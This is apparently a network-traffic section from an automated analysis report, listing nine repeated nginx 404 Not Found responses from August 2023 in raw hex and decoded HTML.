                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:31 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:33 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:35 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:37 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:42 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:33:45 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
